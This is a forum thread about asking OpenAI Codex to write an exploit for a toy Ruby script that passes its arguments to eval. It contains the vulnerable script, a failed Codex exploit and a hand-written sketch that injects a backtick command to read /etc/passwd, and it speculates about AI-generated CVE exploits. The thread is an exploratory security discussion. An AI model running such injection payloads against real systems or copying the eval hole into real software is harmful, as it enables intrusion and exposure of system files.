OpenAI Codex and exploit development

Hello everyone,

So I had the idea to ask Codex to generate a simple exploit for a vulnerable Ruby script. Here’s what happened:

#!/usr/bin/ruby
# vulnerable.rb code:

puts "Calculating"
first_number  = ARGV[0]#.to_i
second_number = ARGV[1]#.to_i
print "Args:",first_number,second_number,"
"
print eval(first_number+"+"+second_number)

#!/usr/bin/env python3
# exploit.py code that runs vulnerable.rb and injects "cat /etc/passwd" command


import sys
import subprocess

# Run vulnerable.rb
proc = subprocess.Popen(["ruby", "vulnerable.rb"], stdout=subprocess.PIPE)


# Read the output of vulnerable.rb
output = proc.stdout.readline()

# Extract the first argument from the vulnerable.rb output
first_number = output.split()[1]

# Extract the second argument from the vulnerable.rb output
second_number = output.split()[3]

# Run the vulnerable.rb with the injected command
proc = subprocess.Popen(["ruby", "vulnerable.rb", first_number, second_number, "cat /etc/passwd"], stdout=subprocess.PIPE)

# Read the output of vulnerable.rb
output = proc.stdout.readline()

# Print the output of vulnerable.rb
print(output)

So obviously it failed: the generated exploit runs vulnerable.rb with no arguments and tries to parse numbers back out of its output, and the injected command ends up as a third argument that the script never reads. Still, it has some of the right ideas, and maybe by tweaking the prompts one could generate working exploits (I’m still new to Codex, so I don’t know, maybe better prompts would’ve worked?). If someone more experienced than me can create a working exploit, let me know how.
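For comparison, here’s my own hand-written sketch (not Codex output) of what I think a working injection would look like, assuming vulnerable.rb sits in the current directory and ruby is on the PATH; the file name and payload are just my own guesses. The idea is that eval sees the raw arguments, so the second “number” can carry an extra Ruby expression that shells out:

#!/usr/bin/env python3
# exploit_sketch.py - hand-written sketch, not generated by Codex

import subprocess

# The injected command rides along as the "second number": vulnerable.rb
# builds the string "1+1; puts `cat /etc/passwd`" and evals it, so Ruby
# computes the sum and then prints /etc/passwd to stdout.
payload = "1; puts `cat /etc/passwd`"

result = subprocess.run(
    ["ruby", "vulnerable.rb", "1", payload],
    capture_output=True,
    text=True,
)

print(result.stdout)

I haven’t polished this, but the same idea (put a Ruby expression where a number is expected) is roughly what I’d expect a working Codex-generated exploit to land on.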

Anyway, since my specialty is security, I’m wondering what the implications are of having an AI capable of generating working exploits from vulnerable source code.

I think at this point Codex doesn’t understand CVEs, and when I asked it to write an exploit for a specific CVE, it failed. Will this change in the future? Would it be possible to create arbitrary exploits by asking it to “create a python file that’ll try CVE-XXXX-XXXX and CVE-YYYY-YYYY on target ZZZZ”? What would the implications of that be for the security of the Internet?

I don’t have any clear questions, and all of this is still fuzzy to me, which is why I wanted to start a discussion around IT security in this forum.


Thanks @m-a.schenk, I checked the paper and it’s a little clearer now. However, I still think more research is needed; the short section in the paper doesn’t really cover enough of the possible risks. Is anyone already working on some kind of security assessment of the model?


I’m also combining cybersecurity research with machine learning. Feel free to DM me and maybe we can work on something together. If you read the Codex Release Research Paper, they address the security aspect in Appendix G.